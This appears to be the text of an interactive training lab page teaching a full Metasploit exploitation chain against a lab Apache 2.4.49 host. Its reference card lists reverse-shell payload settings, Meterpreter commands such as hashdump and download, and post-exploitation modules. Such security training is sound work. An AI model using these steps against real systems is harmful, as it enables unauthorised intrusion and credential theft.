CyberSec Lab — Metasploit

███╗ ███╗███████╗████████╗ █████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗ ████╗ ████║██╔════╝╚══██╔══╝██╔══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔████╔██║█████╗ ██║ ███████║███████╗██████╔╝██║ ██║ ██║██║ ██║ ██║╚██╔╝██║██╔══╝ ██║ ██╔══██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║

METASPLOIT FRAMEWORK

FULL EXPLOITATION CHAIN TRAINING LAB

MODULE 07 — SEARCH · USE · SET · EXPLOIT · METERPRETER · POST

Loading module database (2,348 exploits)...

OBJECTIVES

Launch msfconsole

Search for an exploit module

Select and configure the module

Set payload and options

Run the exploit

Interact with Meterpreter session

Run a post-exploitation module

Read the root flag

💀

msfconsole

🔍

Module Browser

🖥️

Sessions

📖

Reference

📝

Notepad

🏴

Submit Flag

PENTEST ENGAGEMENT — AUTHORISED

METASPLOIT — FULL CHAIN

TARGET: 10.10.17.20 — target.apexlab.local

SCENARIO

Nmap previously confirmed Apache 2.4.49 running on 10.10.17.20 — a version known to be vulnerable to a path traversal / RCE vulnerability. Use Metasploit to find the right module, configure it, exploit the target, and work through a full post-exploitation workflow.

TARGET

Property	Value
IP	10.10.17.20
Hostname	target.apexlab.local
Port 80	Apache 2.4.49
Port 22	OpenSSH 8.9
OS	Ubuntu 22.04

WORKFLOW

Type msfconsole to launch the framework
Use search to find the exploit module
Use use [module] to select it
Use info to learn about it
Use set to configure options
Use run or exploit
Work in the Meterpreter session
Run post-exploitation modules

Display Mode

TERMINAL — attacker@kali:~$

attacker@kali:~$ # Type "msfconsole" to launch, or "help" for commands

attacker@kali:~$

SESSION MANAGER

Type

Info

User

Host

Action

No active sessions — run an exploit to open a session

REFERENCE — METASPLOIT

CONSOLE COMMANDS

msfconsole # Launch framework search [term] # Find modules use [module/number] # Select module info # Module details show options # Show config options show payloads # List payloads set [OPTION] [value] # Set option setg [OPTION] [value] # Set globally unset [OPTION] # Clear option run / exploit # Execute back # Deselect module sessions # List sessions sessions -i [id] # Interact with session

COMMON OPTIONS

set RHOSTS 10.10.17.20 # Target IP set LHOST 10.10.14.1 # Your IP set LPORT 4444 # Listen port set PAYLOAD [payload] # Set payload

METERPRETER COMMANDS

sysinfo # OS + hostname getuid # Current user getpid # Process ID ps # Process list shell # Drop to OS shell hashdump # Dump password hashes download [file] # Download file upload [file] [path] # Upload file ls / pwd / cd # File navigation background / bg # Background session run [post module] # Run post module

PAYLOAD TYPES

Singles — self-contained, small, less features
Stagers — small, connect back, load stage
Stages — downloaded by stager, full-featured

Naming: OS/arch/type (e.g. linux/x86/meterpreter/reverse_tcp)

POST MODULES

post/multi/recon/local_exploit_suggester post/linux/gather/hashdump post/multi/gather/env post/linux/manage/shell_to_meterpreter